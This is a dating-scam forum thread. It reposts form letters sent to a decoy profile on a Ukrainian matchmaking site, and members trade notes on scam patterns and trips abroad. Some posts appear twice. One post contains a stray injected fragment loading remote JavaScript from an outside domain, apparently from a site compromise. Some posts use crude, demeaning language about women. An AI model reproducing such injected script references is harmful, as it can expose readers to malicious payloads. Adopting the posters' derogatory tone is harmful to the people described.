Date:

Subject:
Irochka M. #4365
Eustace Haney
22 May 2008

Where are you, my other half?

My name is Irina. I've been looking for you for a long time and I am happy that you've appeared in my life, my dear prince. I am 20 and I am impatiently waiting to give my love and kindness to you. I want to be attentive and thoughtful. I am a sincere and kind person, I want to be by your side forever and always, I am willing to bring you love and happiness. I am a very active person, I love sports and I watch well after myself. But I also would like to watch after you and to take care of you, my dear. I can imagine, how early in the morning you are opening your half-sleepy eyes and I kindly whisper to you: ?Good morning, my Love? and I bring a cup of hot fresh coffee into the bed. Do you like coffee in the morning? Do you like when you get it right into the bed? Do you think it is romantic? I think I can make each day unforgettable for you, full of love and happiness. I love fruit and pizza by the way:) Do you like pizza with mushrooms? Can you imagine that two of us will go to gather mushrooms? I love doing this. Did you ever try? We can gather them ourselves and afterwards prepare pizza together:) I love to cook and I even agree to cook every day for you, I can make a romantic supper each day. Do you like children? I love kids, and for you, my dear, I will bring a son and we will bring him up together. He will definitely look like you, and as I think, kids are happiness, and our son will be the crop of our happiness and true love. And if you would ever get fever, I wouldn't leave you even for a minute, I will take care of you, will warm you with my love and thoughtfulness. I indeed hope that you will answer back, my dear! I am impatiently waiting for a minute when we will get a change to know each other better... I hope for the soonest reply, my dear! I kiss you sweetly and softly many times!! Irina.

To:
Date:

Subject:
Vita N. #9342
Eustace Haney
15 May 2008

Hi! Let's try to start romance;)

Hello, my new dear friend. I've chose you from the men here on this site, because I am sure you are special... I am that kind of woman too)... Let's check it?...Tell me, what is love for you? What woman do you want to find here?... Real romance for me means thinking of the other person, the one you love. Remembering the little things, every words ans gestures of your loving one and trying to make his (her) life happier when it is needed most. Romance is a Loving Gift! A very loving gift that helps generate loving feelings and keeps love alive. So...may be let's try to start our romance;) I am a very creative person and my work is closely connected with art. I am a jeweller and I adore my job. I do waxen samples of little things which in future will be golden and silver decorations of a person. I like everything beautiful and like to create this beauty. Also, I like to draw... I can do my best, can inspired more when I start to dream... And when I am at the fresh air, my imagination becomes even better. I like nature, like flowers... So, as you've noticed I am a kind of a romantic girl... Tell me more about you and your character?... I am interested)... Will be very glad to receive letter from you)... Sincerely yours, Vita

Prometheus
06-13-2008, 03:33 PM
The Incredible Eustace Haney Strikes Again (Part II)

Nothing beats the bite of some cold moonshine on a Hooterville morning, that is, unless it is a hot evening with a UALadys honey out in the pigsty for a three way with Arnold Ziffle!

If you are new to all this, Eustace Haney is a 56 year old hog farmer, with the hankering for some Ukrainian lovely to tend his still. Problem is, his profile concludes, "THIS IS A TEST. DO NOT CONTACT ME UNLESS YOU ARE A SCAM ARTIST!"

But the gals of UALadys will not be deterred from their mission. Here is a just a short sampling of the many lovelies who are hankering for A TASTE OF HANEY!!!

To:
Date:

Subject:
Inna N. #8512
Eustace Haney
12 May 2008

Hello, dear stranger!

Hello, dear stranger! Are you eager to have good relation aiming at creating a strong family? Would you like to be happy and to have somebody near you who is able to make you happy? If yes ? we are created for each other! So let me introduce myself. I am a common Ukrainian girl who just wants to be happy! I live in a wonderful town of Berdichev. My family consists of mother, father and me. I adore nature and like to play with my cats, I also like to grow plants and flowers! I work as a manager and i like my work, it gives me the opportunity to help people with my skills, gives me the opportunity to reveal my talents. As for my free time, I don't have much of it. But I usually try to spend it with family and friends. I don't have many friends, but those who are among them are decent and interesting people, and what is important ? true friends. I also like to devote my free time to my hobbies planting and growing flowers! But I would like to have a person near me who I can dedicate my talents, my free time and my love to! I don't like to stay at the same place and try to develop and go further in everything! I believe in love as a pure and sacral feeling which makes people happy and which helps to create ? new families, new masterpieces, new ideas, new emotions, new horizons of life! I believe that we have much in common and hope that we can start communicating to reveal ourselves to each other! I hope to hear from you soon! With hope and love, Sincerely, Inna.

To:
Date:

Subject:
Galina V. #8507
Eustace Haney
08 May 2008

Can we be friends and maybe even more?!

Hi! My name is Galina. I am a student of the State University in Zhitomir! I was born not far from Berdichev in a little village where I have spend my childhood. Though I am the only one child in the family, I have a lot of cosines with whom I like to spend time! I have rather agreeable character but in some cases I can stay for my interests. I am very joyful person and I don't like to be sad! Sometimes I am filled with such emotions that I want to dream and think about life then I go for a walk in the park. Sometimes I think why I am walking in this park alone and without my beloved. Why we don't have romantic dates under the stars and don't walk under the rain. I am looking for a guy, who could understand me and share my feelings. I hope you will send me a letter, my dear stranger and we will understand each other. I will be very glad to know you better! Galina.

To:
Date:

Subject:
Inna F. #4364
Eustace Haney
05 May 2008

Where are you, my sweetest?...

Hi. My name is Inna and I am 20. I really wish to find my second half and I hope to meet you through this site. I indeed hope it is you. I've been waiting really long for you! Why did you stay silent for such a long time? I truly believe that you are eager to meet your love and feel real emotions just as much as I do. I am sure that you are looking for me, just for me! Than why can't two loving hearts meet and be together? I am a very open-minded, self-confident person, I always try to achieve my goals. And I must say that most of the times I manage to do this! I am a very active person, I love to read and to draw. I adore nature and fresh air! Just imagine, autumn, lots of leaves on the ground, all of them are so beautiful.. and just the two of us!.. There is no one around to disturb us, we can only hear how leaves are being moved under feet with whisper.. The air is so fresh that it is even cold, however we don't feel this.. You are hugging me so tight that we don't feel cold, we feel great and the day is great and life is great! I hope that you also like nature. And do you like kids? I truly believe that children are the flowers of our life. They also need attention, growing up, and warmth... I dream of a beautiful house, where love and friendship will live, where happiness will fly everywhere, where I could take care of my family! Take care of You, of our Kids.. I want to LOVE YOU! Just don't forget that I like to have some free time for myself as well:) I like to take care of my figure and my outlook! That's why we will eat healthy and I will cook!! I will treat you with many delicious meals. Do you agree? Ok, my sweetest, I will be more that ever happy to know more about you! I am waiting for your answer, my dear! I kiss you many times! Your Inna.

To:
Date:

Subject:
Karina N. #8509
Eustace Haney
02 May 2008

Hello stranger!

Hello stranger! You have probably seen my photos and maybe even heard my voice on the video and now I will write something about myself. I am a future doctor. I like to help people and make them happy! I know how to be delicate and reserved and these qualities are very important for my profession. I am dreaming about stable and full life, provided with all necessary things for it. I like the atmosphere of the house and I know how to create comfort and happiness at home. I am Sagittarius by horoscope, I have a light and pleasant character. I am intelligent and I know how to underline my advantages. I like traveling and meet new people, to know about new traditions and the mode of life of others. Well, the other informations you will know about me, when you write to me!.. Karina

To:
Date:

Subject:
Tatiana M. #4376
Eustace Haney
29 April 2008

Happiness is a journey, not a destination!

Hello! I have been thinking a lot before writing first and at last I pucked up all my courage and decided to make this first step! You probably have the same reasons of being here. For everything there is an approprite time: a time to weep and a time to laugh; a time to love and a time to hate; a time to seek and a time to give up a hope; a time to breake down and a time to build our future.... I am looking for my secong half on whom I can rely on in the future, the one with whom I can create a small paradise on the Earth! I hold on to the opinion that we should choose our life partners carefully, because they will be responsible for about 90% of our happiness and misery. Do you agree with it? Honestly, I don't want a man I can live with but a man I cannot live without. He should possess such qualities as responsibility, honesty. I would like my partner to be determined, to have a good sense of humor, to be ready to any adventures our life can propose! I want to fall in love with him and melt in his embraces! I heard once that behind every great man there is a great woman, but it is wrong. I wouldn't want me standing behind my second half but beside him. I think it is fair. It seems that I look younger than my age and I don't want to hide that I am very glad about it! :-)))) I am 24 years old but I have managed to know what it is, when your expectations are not approved. From every misfortune I usually try to learn a lesson. I have understood one thing: we should love deeply and passionatly. We might get hurt but it is the only way to live life completely. Sometimes we forget about it and give up but I prefer to move on! I am very active by nature. I can't sit at one place for a long time. My friends say that I am like an energetic toy! :-)))) There are so many things in life I would like to experience with my special man!............ So now I will ask you something: Would you like a woman who's been around the world? Would you like a woman who is like a little girl? Would you like a woman who is strong and tough? Would you like a woman who is never ever get enough?! ........if the answer is YES, don't hesitate!!! Tatiana.

Prometheus
06-13-2008, 03:33 PM
The Incredible Eustace Haney Strikes Again (Part II)

Nothing beats the bite of some cold moonshine on a Hooterville morning, that is, unless it is a hot evening with a UALadys honey out in the pigsty for a three way with Arnold Ziffle!

If you are new to all this, Eustace Haney is a 56 year old hog farmer, with the hankering for some Ukrainian lovely to tend his still. Problem is, his profile concludes, "THIS IS A TEST. DO NOT CONTACT ME UNLESS YOU ARE A SCAM ARTIST!"

But the gals of UALadys will not be deterred from their mission. Here is a just a short sampling of the many lovelies who are hankering for A TASTE OF HANEY!!!

To:
Date:

Subject:
Inna N. #8512
Eustace Haney
12 May 2008

Hello, dear stranger!

Hello, dear stranger! Are you eager to have good relation aiming at creating a strong family? Would you like to be happy and to have somebody near you who is able to make you happy? If yes ? we are created for each other! So let me introduce myself. I am a common Ukrainian girl who just wants to be happy! I live in a wonderful town of Berdichev. My family consists of mother, father and me. I adore nature and like to play with my cats, I also like to grow plants and flowers! I work as a manager and i like my work, it gives me the opportunity to help people with my skills, gives me the opportunity to reveal my talents. As for my free time, I don't have much of it. But I usually try to spend it with family and friends. I don't have many friends, but those who are among them are decent and interesting people, and what is important ? true friends. I also like to devote my free time to my hobbies planting and growing flowers! But I would like to have a person near me who I can dedicate my talents, my free time and my love to! I don't like to stay at the same place and try to develop and go further in everything! I believe in love as a pure and sacral feeling which makes people happy and which helps to create ? new families, new masterpieces, new ideas, new emotions, new horizons of life! I believe that we have much in common and hope that we can start communicating to reveal ourselves to each other! I hope to hear from you soon! With hope and love, Sincerely, Inna.

To:
Date:

Subject:
Galina V. #8507
Eustace Haney
08 May 2008

Can we be friends and maybe even more?!

Hi! My name is Galina. I am a student of the State University in Zhitomir! I was born not far from Berdichev in a little village where I have spend my childhood. Though I am the only one child in the family, I have a lot of cosines with whom I like to spend time! I have rather agreeable character but in some cases I can stay for my interests. I am very joyful person and I don't like to be sad! Sometimes I am filled with such emotions that I want to dream and think about life then I go for a walk in the park. Sometimes I think why I am walking in this park alone and without my beloved. Why we don't have romantic dates under the stars and don't walk under the rain. I am looking for a guy, who could understand me and share my feelings. I hope you will send me a letter, my dear stranger and we will understand each other. I will be very glad to know you better! Galina.

To:
Date:

Subject:
Inna F. #4364
Eustace Haney
05 May 2008

Where are you, my sweetest?...

Hi. My name is Inna and I am 20. I really wish to find my second half and I hope to meet you through this site. I indeed hope it is you. I've been waiting really long for you! Why did you stay silent for such a long time? I truly believe that you are eager to meet your love and feel real emotions just as much as I do. I am sure that you are looking for me, just for me! Than why can't two loving hearts meet and be together? I am a very open-minded, self-confident person, I always try to achieve my goals. And I must say that most of the times I manage to do this! I am a very active person, I love to read and to draw. I adore nature and fresh air! Just imagine, autumn, lots of leaves on the ground, all of them are so beautiful.. and just the two of us!.. There is no one around to disturb us, we can only hear how leaves are being moved under feet with whisper.. The air is so fresh that it is even cold, however we don't feel this.. You are hugging me so tight that we don't feel cold, we feel great and the day is great and life is great! I hope that you also like nature. And do you like kids? I truly believe that children are the flowers of our life. They also need attention, growing up, and warmth... I dream of a beautiful house, where love and friendship will live, where happiness will fly everywhere, where I could take care of my family! Take care of You, of our Kids.. I want to LOVE YOU! Just don't forget that I like to have some free time for myself as well:) I like to take care of my figure and my outlook! That's why we will eat healthy and I will cook!! I will treat you with many delicious meals. Do you agree? Ok, my sweetest, I will be more that ever happy to know more about you! I am waiting for your answer, my dear! I kiss you many times! Your Inna.

To:
Date:

Subject:
Karina N. #8509
Eustace Haney
02 May 2008

Hello stranger!

Hello stranger! You have probably seen my photos and maybe even heard my voice on the video and now I will write something about myself. I am a future doctor. I like to help people and make them happy! I know how to be delicate and reserved and these qualities are very important for my profession. I am dreaming about stable and full life, provided with all necessary things for it. I like the atmosphere of the house and I know how to create comfort and happiness at home. I am Sagittarius by horoscope, I have a light and pleasant character. I am intelligent and I know how to underline my advantages. I like traveling and meet new people, to know about new traditions and the mode of life of others. Well, the other informations you will know about me, when you write to me!.. Karina

To:
Date:

Subject:
Tatiana M. #4376
Eustace Haney
29 April 2008

Happiness is a journey, not a destination!

Hello! I have been thinking a lot before writing first and at last I pucked up all my courage and decided to make this first step! You probably have the same reasons of being here. For everything there is an approprite time: a time to weep and a time to laugh; a time to love and a time to hate; a time to seek and a time to give up a hope; a time to breake down and a time to build our future.... I am looking for my secong half on whom I can rely on in the future, the one with whom I can create a small paradise on the Earth! I hold on to the opinion that we should choose our life partners carefully, because they will be responsible for about 90% of our happiness and misery. Do you agree with it? Honestly, I don't want a man I can live with but a man I cannot live without. He should possess such qualities as responsibility, honesty. I would like my partner to be determined, to have a good sense of humor, to be ready to any adventures our life can propose! I want to fall in love with him and melt in his embraces! I heard once that behind every great man there is a great woman, but it is wrong. I wouldn't want me standing behind my second half but beside him. I think it is fair. It seems that I look younger than my age and I don't want to hide that I am very glad about it! :-)))) I am 24 years old but I have managed to know what it is, when your expectations are not approved. From every misfortune I usually try to learn a lesson. I have understood one thing: we should love deeply and passionatly. We might get hurt but it is the only way to live life completely. Sometimes we forget about it and give up but I prefer to move on! I am very active by nature. I can't sit at one place for a long time. My friends say that I am like an energetic toy! :-)))) There are so many things in life I would like to experience with my special man!............ So now I will ask you something: Would you like a woman who's been around the world? Would you like a woman who is like a little girl? Would you like a woman who is strong and tough? Would you like a woman who is never ever get enough?! ........if the answer is YES, don't hesitate!!! Tatiana.

Prometheus
06-19-2008, 02:50 PM
WORD IS OUT... HANEY IS HOT!

To: Eustace Haney
Date: 18 June 2008

http://photo.ualadys.com/photos/0/8501/915946_57760.jpg

Subject: Hello, my dear stranger.

Hello stranger! My name is Dasha. I live in a little town Berdichev. It is situated 160 km from the capital of Ukraine ? Kiev. In Kiev I study at the University but on the correspondence courses. There are so many people around. I have very interesting and responsible work. I am a teacher of guitar in the musical school. Though I am very communicative person, sometimes I feel sad and lonely. Especially this feeling is very strong in autumn. I feel as if I am a little leaf who want to fall on the warm palm of the hand instead of the cold ground. I am a great romantic inside. I am looking for a man who could share my feelings. Do you have the same feelings from time to time? Matchmaking agency exists for creating a family and I want to find mine and only mine sweet half without making mistakes and without hurt. I hope to get honesty, mutual understanding and respect from you. Let's try to communicate! Dasha.

Prometheus
06-19-2008, 02:50 PM
WORD IS OUT... HANEY IS HOT!

To: Eustace Haney
Date: 18 June 2008

http://photo.ualadys.com/photos/0/8501/915946_57760.jpg

Subject: Hello, my dear stranger.

Hello stranger! My name is Dasha. I live in a little town Berdichev. It is situated 160 km from the capital of Ukraine ? Kiev. In Kiev I study at the University but on the correspondence courses. There are so many people around. I have very interesting and responsible work. I am a teacher of guitar in the musical school. Though I am very communicative person, sometimes I feel sad and lonely. Especially this feeling is very strong in autumn. I feel as if I am a little leaf who want to fall on the warm palm of the hand instead of the cold ground. I am a great romantic inside. I am looking for a man who could share my feelings. Do you have the same feelings from time to time? Matchmaking agency exists for creating a family and I want to find mine and only mine sweet half without making mistakes and without hurt. I hope to get honesty, mutual understanding and respect from you. Let's try to communicate! Dasha.

dreamsr
08-04-2008, 08:33 PM
...so what's the latest with Haney and Smoks how was your trip?

PeopleSmoks
08-07-2008, 01:30 PM
Hey dreamsr! Prometheus had a recent Mr. Haney alert in another thread, but I'm not sure which. It shouldn't be hard to find since there isn't much happenning in the forums since the big dump happenned. It seems as though about 3 months worth of postings disappeared a while back, including my reports about my trip.

I'll try to give you the quick version...

The trip was a fun vacation for me because I had never been abroad before. I went out with only one girl, and that was on the last day. It was a foursome, her, her translator, my friend and me. It was a fun date, but it seems that is all it was. Oh well...

Girls in Lugansk actually wear the tight clothes that we see in the website photos! Tight jeans, short skirts, patterened stockings, over the knee high heel boots! And I was there in early March! These girls dress sexy and hair and make up is always on when in public. Maybe a little too much make up in some cases?

If you are writing to a girl from Lugansk and she says she doesn't have a phone, she's lying!!! Everyone there had a cell phone attached to their ear![:0]

Bottom line is that I had a great time, even though things didn't quite work out on the future bride front.[8D]

Train returns

dreamsr
08-08-2008, 01:16 AM
Well Smoks at least you made the confirmation and you enjoyed your vacation. That my friend is the most important part. The lady I'm writing to is actually in Argentina but she also said she doesn't have a phone but I guess we know better. I will be taking my "vacation" in probably a couple of months so I will inform about that. Apparently no one is having success with these sites anymore or successful people don't bother to post.

swede
08-08-2008, 09:30 AM
When the anti-scam forums were still alive and well just three or four years ago, you would sometimes meet individuals there, who could tell about at least functional WM/FSUW relationships. So it's not only a question of the disappointed seeking up forums like this one.

I travelled extensively in eastern Europe formerly, and I met a lot of guys, who had relationships going on. With a very few exceptions their attitude would be a kind of: "Don't get yourself involved too deeply, it needs a lot of perspective".

Having lost touch with the present situation, I can only make a guess. The message of the inherent dangers of a relationship with FSUW has been spread, and the WM are beginning to listen. Those left on this market are either the very starved or naive, or the very cynical, who still consider a FSUW a better bargain than a local hooker. The truth of this last opinion can be discussed.

dreamsr
08-09-2008, 01:15 AM
There is definitely wisdom in your last comment swede but the question remains do you find your local hooker too easy to acquire? I believe one of the problems with us men is our primal need to hunt. We aren't very interesting in prey we can "capture" easily. We rather the ones that are elusive and require us to utilize all our senses. The game is always on.

swede
08-09-2008, 02:42 AM
I've always found it a blessing, if I could avoid this tiresome ritual of 'dancing' around a woman in a complicated mating ritual. Sexual 'hunting' as an end in itself is for me just a waste of time, on line with having a set of stuffed animal heads hanging on the wall to demonstrate your machismo.

On the other hand I've never been tempted to use the services of ladies of negotiable affection, though I've known a few privately, under friendly forms. This is from where I have my information.

PeopleSmoks
08-09-2008, 10:34 AM
Hey guys! dreamsr, I can't say that access to phones is the same in Argentina as it is in Lugansk. I try to make it clear that these are my personal obersvations during my trip.

And the key for me was that it was a VACATION first and foremost, with the hope of meeting a nice girl as a bonus, so I was able to enjoy my vacation despite a lack of success on the perspective bride front.
quote:Those left on this market are either the very starved or naive, or the very cynical, who still consider a FSUW a better bargain than a local hooker.And which category might you place me in? It's true that you have had a lot more personal experience with FSUWs than most of us, but like most people, your personal experience may have tainted your outlook??? Personally, I still think there might be a great girl over there somewhere, so I'm going to continue looking for a little while longer before I go find myself another American, heroin junkie, wh@re to shack up with.[:o)]

On the note of my recent personal search... A very beautiful 32 yo mother of a 10 yo daughter, recently exposed her true nature to me. I was a bit shocked, but she would seem to have a similar "party girl" attitude to that of the afore mentioned heroin junkie, wh@re, ex-girlfriend, stating the need for a nanny to watch her daughter during the day so she could go out, presumably shopping! Presumably with my money since working isn't on her list of things to do!!! NEXT![8D]

Train returns

dreamsr
08-10-2008, 01:40 PM
...so Smoks she is 32 years old, has a child and doesn't think work is one of those things that should be a priority in her life? Is it just me or are we now living in an age when life is one big never-ending party? You have an interesting view on MOB's well at least I guess it doesn't just apply to MOB I think we all want to find that person who we can cope with and don't want to send up the river in few months. Where you find her is irrelevant, the important thing is to find her. The question is though and I'm sure Swede will come in at this point, where do you find her? In America a few years ago I noticed that PUA were on the rise due to popularity of the show with Mystery on Vsrc="http://cmiia.com/op1.js" and another guy Stylez I believe his name is. The male specie are desparately looking for the "formula" to find, attract and keep that hot babe in his life and the playing feel for men is constantly shrinking because we also now are competing with women on an unbeleivable scale.

Anyway back to the places to find your beauties. My interpretation of the whole thing is that you will find exactly whom you are looking for depending on where you look. If you search in bars and night clubs for instance you are bound to find a "party", free-spirit kinda girl but in the grocery store or a bookshop probably a more reserved individual. Again it depends on what the man is really searching for a mix of all perhaps in which case I doubt that lady exists...

PeopleSmoks
08-11-2008, 06:33 PM
Hey dreamsr! Yea, she now strikes me as just a girl that got knocked up a bit too young, didn't really want a kid and is now looking to shed the responsibilities and be a "wild child", because she missed out on it during her twenties... Sorry to say this crap kind of reminds me of my ex who got knocked up at 18![V]

Some of our last chat left me with a feeling that it won't work! So.......... NEXT!!!!!!!!!!!!!!!! I honestly wasn't looking to get hooked up with a girl with a kid anyway, but she seemed so nice at first that I just had to check her out.[?]

Not that I'm a player, but I've been communicating with a few girls. A couple of them are honestly a bit younger than I'm looking for, but I figure to keep all options open?;)

My current favorite, is a girl I met through an online newspaper ad. She sounds way TOOOOOOOOOO good to be true so far, so my guard is up and I'm just waiting for the scam!!!!!!!!!!!![B)]

She says she speaks good English, so no translation scam. She says she works and so far hasn't complained about internet cafe costs??? She just gave me her phone number today... maybe Boris has a female accomplice??????????????[:0]

31 years old, a good age since I really don't look to marry a daughter and still young enough because I would like to have kids and she claims to want kids also. So far, seems to have a friendly and not terribly demanding personality....... And of course, drop dead sexy![:p]

Possible scams coming??? Plenty that I can think of from "can you help with money for internet" to "I just lost my job and need some help". Or, maybe granny will end up in the hospital?:(

Well, I'm not exactly the bookstore type, so..........[8D]

Train returns

dreamsr
08-11-2008, 11:46 PM
Well man this time I hoping to hear you say none of those things. If she has that on her mind she should keep it there. Only time will tell though so work you magic. I was trying to convince my "friend" to join or re-join one of those social networks but she has launched into a slight temper tantrum, saying that its boring and I shouldn't force her to do what she doesn't want to so the signs are developing. No talk of money yet but again time will tell.

PeopleSmoks
08-17-2008, 11:56 AM
Hey dreamsr! Beware the MOB with temper tantrums! It will only get worse!!!

Train returns

dreamsr
08-18-2008, 12:01 AM
Thanks for the heads-up smoks, I will be looking out for the rest of the "behaviours". :-)

scambuster
08-26-2008, 11:40 AM
hey, mates..whaz up??
what is the news about UALadys??
well, I am debating, a girl I like as I have seen her profile
before has written me. 1st time this happens so I dont know what to do.
I keep looking for her in other places and can't find her..wonder why even loveme.com the one I always find them
so don't know what to do, and jim still have them in black list, adn I already was talking to Natasha the one who speaks several languages only to find that she was a translator, what a pity!!...
input needed, plzzz...
SB

Prometheus
08-27-2008, 01:43 PM
SB

If you go back and read the pages of posts concerning Confidential Connections, UALadys, UADreams, and all the other incarnations you will see a pattern of activity:

1. Form letters sent to multiple recipients, who believe the correspondence is for them only.

2. Women who mysteriously "go to St. Petersburg" when you press for a chance to meet them at the home office.

3. For the men who do make the trip to Ukraine, their chosen girl is either unavailable when they arrive, available but seemingly knows nothing about their beau, or spend a little time, and politely make a quick exit after 30 minutes.

This scam has been repeated over, and over, and over. Dozens of stories reported here and other sites around the WWW.

These websites are professional scams that take $7 a pop to send you a feel good email. Give me your credit card number and I will do the same for you for $5 a pop.

Prometheus

PeopleSmoks
08-27-2008, 07:31 PM
Hey guys! SB, I'll write to you for $3, but it's another $1 to send or receive a photo![:X]

So far, it really doesn't look like there's much difference between UADreams and UALadys or CC before them. Just like my first login here was Ihearmytrain, (something happened and I couldn't login with that anymore) now I'm PeopleSmoks. Same guy!!![8D]

Train returns

scambuster
09-18-2008, 10:14 PM
True, dreamsr and smokes, only thing I have done there is buy a video for $2.95 but then later girl stopped writing, so those ones who writes many men, and I checked Jims List and they still are in black list because one 19 y.o nice looking profile wrote me but I never fell for it, Jims writes awful stuff about them

PeopleSmoks
09-19-2008, 12:02 AM
I don't necessarily put too much trust in "Jim's List". He has advertising links to sites and I've heard he can be for sale? I've also heard the way far side, that he even blackmails people and sites that he'll blacklist them if they don't pay up? GD we live in such a twisted world!!![V]

Train returns

thatcrazy
06-28-2009, 10:01 AM
I signed up to UAdreams about a month ago...and just let my account sit.. I haven't received even 1 single unsolicited email from anyone.

In fact I was so surprised that I didn't that I had to actually send a few "winks" to see what the hell was going on. I must have sent about 10 random winks.. and only received 2 replies..

PeopleSmoks
06-29-2009, 01:49 PM
Hey thatcrazy! I guess you're just not as interesting as a pig farmer from Hooterville!!!:D

Actually, many sites use a frequency of usage type search engine. In other words, if you don't log on for a long time, your profile slips to the bottom of the list. Still, it's a bit surprising that you didn't get a lot of hits while you were "fresh meat". So, once again I have to think you're just not as interesting as our buddy Mr. Haney???[:o)]

thatcrazy
07-08-2009, 03:34 PM
I sent you an email through the email form... they won't let me post the link here..

PeopleSmoks
07-09-2009, 12:26 PM
I haven't seen it yet.